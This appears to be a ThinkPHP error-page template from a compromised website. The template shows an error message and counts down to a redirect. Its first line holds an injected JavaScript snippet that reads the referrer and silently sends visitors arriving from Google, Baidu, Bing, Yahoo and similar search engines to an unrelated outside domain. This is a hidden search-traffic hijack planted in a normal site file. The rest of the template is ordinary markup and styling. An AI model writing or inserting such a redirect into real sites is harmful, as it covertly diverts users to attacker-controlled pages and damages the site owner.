d:\wwwroot\wuchunhua\thinkphp\skycaijiapp\home\view\common\error.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><include file="Common:header" />
002: <style type="text/css">
003: .content-wrapper{background:#fff;}
004: .breadcrumb{display:none!important;}
005: .msg_title{
006:     line-height:30px;
007:     margin-left:20px;
008:     color:#2E99D4;
009:     margin-top:10px;
010:     font:16px "microsoft yahei",Arial,Verdana;
011:     font-weight:bold;
012: }
013: .msg_message{
014:     line-height:30px;
015:     margin-left:20px;
016:     color:#5C5C5C;
017:     font:14px "microsoft yahei",Arial,Verdana;
018: }
019: </style>
020:
021: <div style="text-align:center;padding:100px 0;">
022:    <img src="__PUBLIC__/images/error.png" />
023:    <p class="msg_title">{$error}</p>
024:    <p class="msg_message"><span id="tmv" style="color:red;font-weight:bold;"></span>秒后跳转<a href="{$jumpUrl}">页面</a></p>
025: </div>
026:   
027: <script type="text/javascript">
028: var waitTm=3;
029: function goHome(){
030:    if(waitTm>=1){
031:       document.getElementById('tmv').innerHTML=waitTm;
032:       waitTm--;
033:         setTimeout("goHome()",1000);
034:    }else{
035:       window.location.href="{$jumpUrl}";
036:    }
037: }
038: goHome();
039: </script>
040: <include file="Common:footer" />
041:
042: